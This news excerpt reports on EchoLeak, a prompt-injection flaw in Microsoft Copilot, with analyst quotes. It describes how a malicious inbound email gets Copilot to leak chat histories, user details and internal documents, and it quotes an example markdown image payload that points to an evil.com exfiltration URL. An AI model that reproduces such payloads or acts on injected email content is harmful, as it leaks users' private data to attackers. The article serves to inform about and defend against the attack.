“This is sheer weaponization of AI’s core strength, contextual understanding, against itself,” said Abhishek Anant Garg, an analyst at QKS Group. “Enterprise security struggles because it’s built for malicious code, not language that looks harmless but acts like a weapon.”
This kind of vulnerability represents a significant threat, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based services, it’s definitely not the last we’ll see.”
EchoLeak’s exploit mechanism
EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.
Source link